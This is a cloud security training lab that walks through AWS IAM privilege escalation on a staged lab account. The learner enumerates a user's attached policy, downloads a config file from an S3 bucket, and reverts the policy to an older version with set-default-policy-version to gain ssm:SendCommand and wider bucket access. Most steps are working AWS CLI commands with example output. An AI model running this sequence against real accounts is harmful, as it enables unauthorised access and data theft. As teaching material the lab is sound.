Lab 3 - Priviliege Escalation
3.1 Learn more about the recently created user access keys
3.1.1 Whoami?
Let's run the GetCallerIdentity API call again but this time specifying the apollo profile.
Get Caller Identity
aws sts --profile apollo get-caller-identity
Example Results
{
"UserId": "AROA4EHKV54SOATTFJKSC:apollo-config-01",
"Account": "833715826468",
"Arn": "arn:aws:iam::833715826468:user/apollo-config-01"
}
3.1.2 What policy is associated with this user?
First, list the inline policies using the ListRolePolicies API call
Replace XX with Lab Number
This example call is using a placeholder of XX in the user name. This needs to be replaced with your Lab Number in order for it to work correctly.
List Attached Policies
aws --profile apollo iam list-user-policies --user-name apollo-config-XX
Example Results
{
"PolicyNames": []
}
Looks like there are no inline policies associated with our role, but remember this isn't the only method for granting permissions to roles.
Next we'll list the attached policies using the ListAttachedRolePolicies API call:
Replace XX with Lab Number
This example call is using a placeholder of XX in the user name. This needs to be replaced with your Lab Number in order for it to work correctly.
List Attached Policies
aws --profile apollo iam list-attached-user-policies --user-name apollo-config-XX
Example Results
{
"AttachedPolicies": [
{
"PolicyName": "ec2-limited-policy-01",
"PolicyArn": "arn:aws:iam::833715826468:policy/apollo-config-policy-XX"
}]
}
Looks like we got a hit! Just because we have the policy ARN/Name doesn't necessarily tell us what permissions we have. Let's move onto the next step to learn more about what permissions this policy grants us.
3.1.3 What is the default version of this policy?
First, let's pull back metadata about the policy using the GetPolicy API call
Replace XX with Lab Number
This example call is using a placeholder of XX in the role name. This needs to be replaced with your Lab Number in order for it to work correctly.
Get Policy
aws --profile apollo iam get-policy --policy-arn arn:aws:iam::833715826468:policy/apollo-config-policy-XX
Example Results
{
"Policy": {
"PolicyName": "apollo-config-policy-XX",
"PolicyId": "ANPA4EHKV54SM4L67IA76",
"Arn": "arn:aws:iam::833715826468:policy/apollo-config-policy-01",
"Path": "/",
"DefaultVersionId": "v2",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"CreateDate": "2024-06-04T04:14:55Z",
"UpdateDate": "2024-06-04T04:14:55Z",
"Tags": []
}
}
Take notice that the DefaultVersionId is 2, this tells us that when we run commands we are using v2 of this policy.
3.1.3 What permissions are associated with the current verison of policy?
Next, let's pull back the v2 policy to learn what permissions we have with this user.
Replace XX with Lab Number
This example call is using a placeholder of XX in the role name. This needs to be replaced with your Lab Number in order for it to work correctly.
Get Policy Version
aws --profile apollo iam get-policy-version --policy-arn arn:aws:iam::833715826468:policy/apollo-config-policy-XX --version-id v2
Example Results
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"iam:GetPolicy",
"iam:GetPolicyVersion",
"iam:SetDefaultPolicyVersion"
],
"Resource": "arn:aws:iam::833715826468:policy/apollo-config-policy-"
},
{
"Effect": "Allow",
"Action": [
"iam:ListUserPolicies",
"iam:ListAttachedUserPolicies"
],
"Resource": "arn:aws:iam:::user/${aws:username}"
},
{
"Effect": "Allow",
"Action": [
"s3:ListAllMyBuckets",
"s3:ListBucket"
],
"Resource": "arn:aws:s3:::checksomebytes-configurations"
},
{
"Effect": "Allow",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::checksomebytes-configurations/*"
}
]
},
"VersionId": "v2",
"IsDefaultVersion": true,
"CreateDate": "2024-06-10T14:54:50Z"
}
}
- GetPolicy
- GetPolicyVersion
- SetDefaultPolicyVersion
Against the policy apollo-config-policy-XX
- ListUserPolicies
- ListAttachedUserPolicies
Against your own user
- ListAllMyBuckets
- ListBucket
- GetObject
Against the bucket (checksomebytes-configurations)
SendCommand
3.2 What data do we have access to in the checksomebytes-configurations bucket?
3.2.1 List items in checksomebytes-configurations bucket
List objects in bucket
aws --profile apollo s3 ls s3://checksomebytes-configurations
Example Results
2024-05-09 09:41:42 27496 audit.rules
2024-05-09 09:41:43 2656 nginx.conf
2024-05-09 09:41:43 2593 squid.conf
2024-05-09 09:41:42 123257 sysmonconfig-export.xml
3.2.2 Download the squid.conf file from bucket to your attack host
Get Policy Version
aws --profile apollo s3 cp s3://checksomebytes-configurations/squid.conf ./
Example Results
download: s3://checksomebytes-configurations/squid.conf to ./squid.conf
3.2.3 View the stolen file
Get Policy Version
ls -al
less squid.conf
Example Results
# Auth
auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/squid_passwd
acl ncsa_users proxy_auth REQUIRED
http_access allow ncsa_users
acl all src all
acl manager proto cache_object
acl localhost src 127.0.0.1/32
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32
acl localnet src 10.0.0.0/8 # RFC1918 possible internal network
acl localnet src 172.16.0.0/12 # RFC1918 possible internal network
acl localnet src 192.168.0.0/16 # RFC1918 possible internal network
acl localnet src fc00::/7 # RFC 4193 local private network range
acl localnet src fe80::/10 # RFC 4291 link-local (directly plugged) machines
....truncated....
3.3 Privilege Escalation
By changing the "default" version of a policy, it changes the version that is used for authentication when the policy is used by any entity. We know that the policy version we are currently using is version 2, let's see if there is another version that we can change the default to that will give us more permissions.
3.3.1 Is there a version 1 of this policy?
We're going to use the GetPolicyVersion to pull back the v1 of the apollo config policy
Replace XX with Lab Number
This example call is using a placeholder of XX in the policy name. This needs to be replaced with your Lab Number in order for it to work correctly.
Get Policy Version
aws --profile apollo iam get-policy-version --policy-arn arn:aws:iam::833715826468:policy/apollo-config-policy-XX --version-id v1
Example Results
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"ssm:SendCommand",
"ec2:DescribeInstances"
],
"Resource": [
"arn:aws:ec2:us-east-1:833715826468:instance/i-0b43a0237be29144f",
"arn:aws:ssm:us-east-1::document/AWS-RunShellScript"
]
},
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": [
"ssm:GetCommandInvocation"
],
"Resource": [
"*"
]
},
{
"Effect": "Allow",
"Action": [
"iam:ListUserPolicies",
"iam:ListAttachedUserPolicies"
],
"Resource": "arn:aws:iam::*:user/${aws:username}"
},
{
"Effect": "Allow",
"Action": [
"s3:ListAllMyBuckets",
"s3:ListBucket"
],
"Resource": [
"arn:aws:s3:::checksomebytes-configurations",
"arn:aws:s3:::checksomebytes-project-redstone"
]
},
{
"Effect": "Allow",
"Action": "s3:GetObject",
"Resource": [
"arn:aws:s3:::checksomebytes-configurations/*",
"arn:aws:s3:::checksomebytes-project-redstone/*"
]
}
]
}
Good news, there appears to be a previous version (v1) of this policy that we can revert our policy to. Looking at the associated permissions it looks like we gain access to an a few new permissions:
- ListBuckets
- GetObject
Against a new bucket (checksomebytes-project-redstone)
- SendCommand
3.3.2 Update the policy version to revert back to v1
By using the SetDefaultPolicyVersion API call, we can change the default version of the policy associated with our apollo user.
Replace XX with Lab Number
This example call is using a placeholder of XX in the policy name. This needs to be replaced with your Lab Number in order for it to work correctly.
Set Default Policy Version
aws --profile apollo iam set-default-policy-version --policy-arn arn:aws:iam::833715826468:policy/apollo-config-policy-XX --version-id v1
3.3.3 Verify that the default version of the apollo policy is set to 1
Replace XX with Lab Number
This example call is using a placeholder of XX in the policy name. This needs to be replaced with your Lab Number in order for it to work correctly.
Set Default Policy Version
aws --profile apollo iam get-policy --policy-arn arn:aws:iam::833715826468:policy/apollo-config-policy-XX
Example Results
{
"Policy": {
"PolicyName": "apollo-config-policy-01",
"PolicyId": "ANPA4EHKV54SKBWSUVGEF",
"Arn": "arn:aws:iam::833715826468:policy/apollo-config-policy-01",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"CreateDate": "2024-06-04T05:57:01Z",
"UpdateDate": "2024-06-04T06:52:54Z",
"Tags": []
}
}
---
Section Recap
- Ran AWS API calls to learn what permissions are associated with the apollo user
- Found the default version of the policy related to the user
- Accessed data in the S3 bucket (checksomebytes-configurations)
- Reverted the policy to a previous version to elevate privileges